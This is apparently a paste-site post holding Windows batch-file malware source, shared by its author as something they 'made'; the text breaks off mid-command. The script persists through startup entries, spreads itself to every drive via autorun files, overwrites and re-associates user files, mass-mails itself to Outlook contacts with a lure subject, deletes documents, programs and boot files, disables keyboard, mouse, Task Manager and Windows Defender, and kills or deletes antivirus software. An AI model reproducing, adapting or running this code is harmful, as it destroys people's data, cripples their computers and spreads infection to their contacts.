____ _ _ | _ \ _____ _| |__ (_)_ __ | | | |/ _ \ \/ / '_ \| | '_ \ | |_| | (_) > <| |_) | | | | | |____/ \___/_/\_\_.__/|_|_| |_|
Title:cool echo on echo off bat shit i made
Created:Dec 18th, 2020
Created by: [deleted]
Views: 442
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made by Lahat enjoy @ echo off rem --------------------------------- rem Infect Reg Run Key set valinf="rundll32_%random%_toolbar" set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run" reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul rem --------------------------------- rem --------------------------------- rem Infect Startup Folder copy %0 "%userprofile%\Start Menu\Programs\Startup" rem --------------------------------- rem --------------------------------- rem Infect All Drives for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( copy /Y %0 %%E:\ echo [AutoRun] > %%E:\autorun.inf echo open="%%E:\%0" >> %%E:\autorun.inf echo action=Open folder to see files... >> %%E:\autorun.inf) rem --------------------------------- rem --------------------------------- rem Infect Autoexec.bat echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT rem --------------------------------- rem --------------------------------- rem Infect All Folders Dir %SystemRoot% /s /b > PathHost For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul Del /f /s /q PathHost > Nul rem --------------------------------- rem --------------------------------- rem Infect "ls" Cmd copy %0 %windir%\system32\ls.bat rem --------------------------------- rem --------------------------------- rem Infect All .Exe Files assoc .exe=batfile DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All .Txt Files assoc .txt=batfile DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All .Mp3 Files assoc .mp3=batfile DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All .Lnk Files assoc .lnk=batfile DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All .Pdf Files assoc .pdf=batfile DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All .Mp4 Files assoc .mp4=batfile DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All .Doc Files assoc .doc=batfile DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All .Xml Files assoc .xml=batfile DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All .Png Files assoc .png=batfile DIR /S/B %SystemDrive%\*.png >> InfList_png.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All . Files assoc .=batfile DIR /S/B %SystemDrive%\*. >> InfList_..txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_..txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Infect All . Files assoc .=batfile DIR /S/B %SystemDrive%\*. >> InfList_..txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_..txt) do copy /y %0 "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Spread Via Outlook Contact Book echo dim x>>%SystemDrive%\mail.vbs echo on error resume next>>%SystemDrive%\mail.vbs echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs echo Set Mail=ci>>%SystemDrive%\mail.vbs echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs echo Mail.Subject="Is this you?">>%SystemDrive%\mail.vbs echo Mail.Body="Man that has got to be embarrassing!">>%SystemDrive%\mail.vbs echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs echo Mail.send>>%SystemDrive%\mail.vbs echo Next>>%SystemDrive%\mail.vbs echo ol.Quit>>%SystemDrive%\mail.vbs start "" "%SystemDrive%\mail.vbs" rem --------------------------------- @ echo off @ echo off rem --------------------------------- rem Spam Local Disk echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' rem --------------------------------- rem --------------------------------- rem Start Windows XP Secret Song start "" "%systemroot%\system32\oobe\images\title.wma" rem --------------------------------- rem --------------------------------- rem Activate Blue Screen Of Death @((( Echo Off > Nul ) & Break Off ) @Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVersion\Run @Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul @Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*" ) rem --------------------------------- rem --------------------------------- rem Net Send Spam net start "messenger" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" net send * "Spammed Message" rem --------------------------------- rem --------------------------------- rem Hide My Documents Folder attrib +h "%userprofile%\my documents" rem --------------------------------- rem --------------------------------- rem Hide Virus File After Run attrib +h %0 rem --------------------------------- rem --------------------------------- rem Change Computer Time time 12:00 rem --------------------------------- rem --------------------------------- rem Spam With VBScript Msgboxes echo Do>>msgbox.vbs echo x=msgbox("Your computer is infected with a virus!",0+48,"Infected") >>msgbox.vbs echo Loop>>msgbox.vbs start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" start "" "msgbox.vbs" rem --------------------------------- rem --------------------------------- rem Swap Mouse Buttons RUNDLL32 USER32.DLL,SwapMouseButton rem --------------------------------- rem --------------------------------- rem Change User Password To DELmE net user %username% DELmE rem --------------------------------- rem --------------------------------- rem Start Opening Disk Tray echo Do >> "opendisk.vbs" echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs" echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs" echo colCDROMs.Item(d).Eject >> "opendisk.vbs" echo colCDROMs.Item(d).Eject >> "opendisk.vbs" echo Loop >> "opendisk.vbs" start "" "opendisk.vbs" rem --------------------------------- rem --------------------------------- rem Spam Printer echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt" notepad /P "Spam.txt" rem --------------------------------- rem --------------------------------- rem Confuse File Extensions Powerup assoc .dll=txtfile assoc .exe=pngfile assoc .vbs=Visual Style assoc .reg=xmlfile assoc .txt=regfile rem --------------------------------- rem Confuse File Extensions for text assoc .mp3=txtfile assoc .xml=txtfile assoc .png=txtfile rem --------------------------------- rem --------------------------------- rem Hide Music, Video, Picture Folders attrib +h "%userprofile%\my documents\my music" attrib +h "%userprofile%\my documents\my videos" attrib +h "%userprofile%\my documents\my pictures" rem --------------------------------- rem --------------------------------- rem Delete All Pdf DIR /S/B %SystemDrive%\*.pdf >> FIleList_pdf.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_pdf.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Delete All Mp4 DIR /S/B %SystemDrive%\*.mp4 >> FIleList_mp4.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp4.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Delete All Lnk DIR /S/B %SystemDrive%\*.lnk >> FIleList_lnk.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_lnk.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Crash Computer echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat start "" crash.bat rem --------------------------------- rem --------------------------------- rem Delete My Pictures del /f /q '%userprofile%\My Pictures\*.*' rem --------------------------------- rem --------------------------------- rem Delete My Music del /f /q '%userprofile%\My Music\*.*' rem --------------------------------- rem --------------------------------- rem Disable Computer By Deleting hal.dll del /f /q %SystemDrive%\WINDOWS\system32\hal.dll rem --------------------------------- rem --------------------------------- rem Delete All Exe DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Delete All Mp3 DIR /S/B %SystemDrive%\*.mp3 >> FIleList_mp3.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Delete All Texts DIR /S/B %SystemDrive%\*.txt >> FIleList_txt.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_txt.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Delete All Documents DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Delete All Xml DIR /S/B %SystemDrive%\*.xml >> FIleList_xml.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_xml.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Delete All Png DIR /S/B %SystemDrive%\*.png >> FIleList_png.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k" rem --------------------------------- rem --------------------------------- rem Delete My Documents del /f /q '%userprofile%\My Documents\*.*' rem --------------------------------- rem --------------------------------- rem The Last Restart attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini shutdown /r /t 00 rem --------------------------------- rem --------------------------------- rem Delete Notepad tskill notepad del /f /q "%windir%\system32\notepad.exe" rem --------------------------------- rem --------------------------------- rem Delete Calculator tskill calc del /f /q "%windir%\system32\calc.exe rem --------------------------------- rem --------------------------------- rem Delete Access tskill msaccess del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\MSACCESS.EXE" rem --------------------------------- rem --------------------------------- rem Delete Internet Explorer tskill iexplore del /f /q "C:\Program Files\Internet Explorer\iexplore.exe" rem --------------------------------- rem --------------------------------- rem Delete Excel tskill excel del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE" rem --------------------------------- rem --------------------------------- rem Delete Paint tskill mspaint del /f /q "%windir%\system32\mspaint.exe" rem --------------------------------- rem --------------------------------- rem Delete Word tskill WINWORD del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE" rem --------------------------------- rem --------------------------------- rem Delete Outlook tskill outlook del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\OUTLOOK.EXE" rem --------------------------------- rem --------------------------------- rem Delete Safari tskill safari del /f /q "C:\Program Files\Safari\Safari.exe" rem --------------------------------- rem --------------------------------- rem Clear The Screen cls rem --------------------------------- rem --------------------------------- rem Self Destruct del /f /q %0 rem --------------------------------- rem --------------------------------- rem Disable Admin Accounts @Set RegistyEditCmd=Cmd /k Reg Add @Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System @%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul rem --------------------------------- rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem --------------------------------- rem --------------------------------- rem Disable Keyboard echo Windows Registry Editor Version 5.00 > "nokeyboard.reg" echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg" echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg" echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg" echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg" echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg" echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg" echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg" echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg" echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg" echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg" echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg" echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg" echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg" echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg" echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg" echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg" echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg" echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg" echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg" echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg" echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg" echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg" start "nokeyboard.reg" rem --------------------------------- rem --------------------------------- rem Disable Task Manager reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul rem --------------------------------- rem --------------------------------- rem Disable Windows Backup net stop "SDRSVC" rem --------------------------------- rem --------------------------------- rem Disable Internet @Echo off & @@Break Off Ipconfig /release %jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?! P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease% rem --------------------------------- rem --------------------------------- rem Disable Windows Defender net stop "WinDefend" taskkill /f /t /im "MSASCui.exe" rem --------------------------------- rem --------------------------------- rem Disable Windows Update net stop "wuauserv" rem --------------------------------- rem --------------------------------- rem Disable Windows Security net stop "security center" net stop sharedaccess netsh firewall set opmode mode-disable rem --------------------------------- rem --------------------------------- rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* del /Q /F C:\Program Files\alwils~1\avast4\*.* del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe del /Q /F C:\Program Files\kasper~1\*.exe cls del /Q /F C:\Program Files\trojan~1\*.exe del /Q /F C:\Program Files\f-prot95\*.dll del /Q /F C:\Program Files\tbav\*.dat cls del /Q /F C:\Program Files\avpersonal\*.vdf del /Q /F C:\Program Files\Norton~1\*.cnt del /Q /F C:\Program Files\Mcafee\*.* cls del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\*.* del /Q /F C:\Program Files\Norton~1\*.* cls del /Q /F C:\Program Files\avgamsr\*.exe del /Q /F C:\Program Files\avgamsvr\*.exe del /Q /F C:\Program Files\avgemc\*.exe cls del /Q /F C:\Program 